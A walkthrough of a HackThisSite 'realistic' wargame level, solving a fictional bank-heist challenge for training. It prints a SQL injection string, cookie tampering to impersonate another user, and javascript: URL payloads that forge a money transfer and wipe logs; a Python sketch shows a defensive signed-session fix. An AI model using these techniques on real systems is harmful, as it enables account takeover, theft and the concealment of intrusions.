Hackthissite/Realistic/Level8

From aldeid
  • Level: Realistic::8 (United Banks Of America)
  • URL: http://www.hackthissite.org/missions/realistic/8/
  • Difficulty :
  • Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?

Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:

  1. Find the account of Gary Hunter (I don't know his account name).
  2. Move the $10,000,000 into the account dropCash.
  3. Clear The Logs, They're held in the folder 'logFiles'.

I really hope you can do this, because if you can't we're all screwed

  • Solution:

Information

From navigating the site and reading the page sources, we gather the following information:

Pages and their form fields (Description | Page | Fields):

  • Register pages | Register.php > register2.php
      • <input type="text" name="username" maxlength=10>
      • <input type="password" name="password" maxlength=50>
      • <textarea name="desc" rows=5 cols=20 maxlength=255>
  • Login pages | login1.php > login2.php
      • <input type="text" name="username" value="Enter Username">
      • <input type="password" name="Password" value="">
  • Purge files | cleardir.php
      • <input type='hidden' name='dir' value='loginSQLFiles'>
  • Transfer money from one account to another | movemoney.php
      • <input type='text' name='TO' value='Username To Give Money To'>
      • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Gary Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type the following command in the URL bar: javascript:alert(document.cookie); It displays our cookie value (the login and password in clear text, readable and editable from the browser), indicating that the site is vulnerable. Then go to the user info page and enter a SQL injection to show the list of all users: ' or 'a'='a.

By scrolling down, we find:

GaryWilliamHunter : -- $$$$$ --

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (-- $$$$$ --)

Objective 2: Move the $10,000,000 into the account dropCash

Entering the following code in the URL bar displays the cookie contents in clear text, which shows that the site is vulnerable to cookie injection.

javascript:alert(document.cookie);

Install Firebug and Firecookie for Firefox. Then change the value of the cookie named "accountUsername" to "GaryWilliamHunter" and use the following JS injection (copy/paste into the URL bar):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It dynamically writes a form on the page, containing the values needed for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

Submitting the form completes the stage.
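
The transfer works because the FROM account is read from a cookie the client can edit. The following Python sketch is an added example, not part of the original write-up and not the site's code: it puts that weak lookup beside one that binds the account to an HMAC-signed session value. All function names, the "session" cookie name and the key are hypothetical.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side key; generated per process for this demo only.
SERVER_KEY = secrets.token_bytes(32)


def source_account_weak(cookies):
    """Weak pattern: the accountUsername cookie is trusted as-is."""
    return cookies.get("accountUsername")


def _tag(username):
    return hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()


def issue_session(username):
    """After a successful login: cookie value 'username.tag', no password."""
    return f"{username}.{_tag(username)}"


def source_account_hardened(cookies):
    """Return the logged-in account, or None if the cookie was altered."""
    username, sep, tag = cookies.get("session", "").rpartition(".")
    if not sep or not username:
        return None
    # Constant-time comparison on bytes; a wrong or missing tag is rejected.
    if hmac.compare_digest(tag.encode(), _tag(username).encode()):
        return username
    return None


def move_money(cookies, to, amount, lookup):
    """Build a transfer; FROM comes only from the session lookup."""
    sender = lookup(cookies)
    if sender is None:
        raise PermissionError("no valid session")
    if not isinstance(amount, int) or amount <= 0:
        raise ValueError("amount must be a positive integer")
    return {"FROM": sender, "TO": to, "AMOUNT": amount}
```

A production system would normally use the framework's server-side session store with an opaque random ID and an expiry; the signed value here is the minimal form of the same idea.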

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste the following code into the URL bar:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))
